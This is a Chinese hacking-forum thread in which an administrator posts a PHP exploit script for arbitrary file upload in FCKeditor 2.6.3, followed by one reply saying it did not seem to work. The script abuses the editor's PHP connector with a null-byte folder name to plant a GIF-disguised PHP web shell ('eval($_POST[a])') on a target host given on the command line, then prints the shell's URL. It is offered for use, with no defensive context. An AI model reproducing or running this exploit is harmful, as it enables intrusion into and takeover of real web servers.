搜索
查看: 1339|回复: 1

Fckeditor 2.6.3 漏洞 EXP

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-7-5 22:52:42 | 显示全部楼层 |阅读模式
  1. <?





  2. error_reporting(0);

  3. set_time_limit(0);

  4. ini_set("default_socket_timeout", 5);



  5. define(STDIN, fopen("php://stdin", "r"));

  6. $match = array();



  7. function http_send($host, $packet)

  8. {

  9.         $sock = fsockopen($host, 80);

  10.         while (!$sock)

  11.         {

  12.                 print "\n[-] No response from {$host}:80 Trying again...";

  13.                 $sock = fsockopen($host, 80);

  14.         }

  15.         fputs($sock, $packet);

  16.         while (!feof($sock)) $resp .= fread($sock, 1024);

  17.         fclose($sock);

  18.         print $resp;

  19.         return $resp;

  20. }



  21. function connector_response($html)

  22. {

  23.         global $match;

  24.         return (preg_match("/OnUploadCompleted\((\d),"(.*)"\)/", $html, $match) && in_array($match[1], array(0, 201)));

  25. }



  26. print "\n+------------------------------------------------------------------+";

  27. print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";

  28. print "\n+------------------------------------------------------------------+\n";



  29. if ($argc < 3)

  30. {

  31.         print "\nUsage......: php $argv[0] host path\n";

  32.         print "\nExample....: php $argv[0] localhost /\n";

  33.         print "\nExample....: php $argv[0] localhost /FCKEditor/\n";



  34.         die();

  35. }



  36. $host = $argv[1];

  37. $path = ereg_replace("(/){2,}", "/", $argv[2]);



  38. $filename  = "fvck.gif";

  39. $foldername = "fuck.php%00.gif";

  40. $connector = "editor/filemanager/connectors/php/connector.php";





  41. $payload  = "-----------------------------265001916915724\r\n";

  42. $payload .= "Content-Disposition: form-data; name="NewFile"; filename="{$filename}"\r\n";

  43. $payload .= "Content-Type:  image/jpeg\r\n\r\n";

  44. $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";

  45. $payload .= "-----------------------------265001916915724--\r\n";



  46. $packet         = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

  47. //print $packet;

  48. $packet        .= "Host: {$host}\r\n";



  49. $packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

  50. $packet .= "Content-Length: ".strlen($payload)."\r\n";

  51. $packet .= "Connection: close\r\n\r\n";

  52. $packet .= $payload;



  53. print $packet;



  54. if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

  55. else print "\n[-] Job done! try http://${host}/$match[2] \n";





  56. ?>
复制代码


过段时间可能会取消签到功能了

2

主题

25

帖子

87

积分

我是新手

Rank: 1

积分
87
发表于 2016-11-29 10:34:30 | 显示全部楼层
已测试,好像并不可以用,也不知道是不是我姿势不正确,还是说里面的代码需要做更改
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表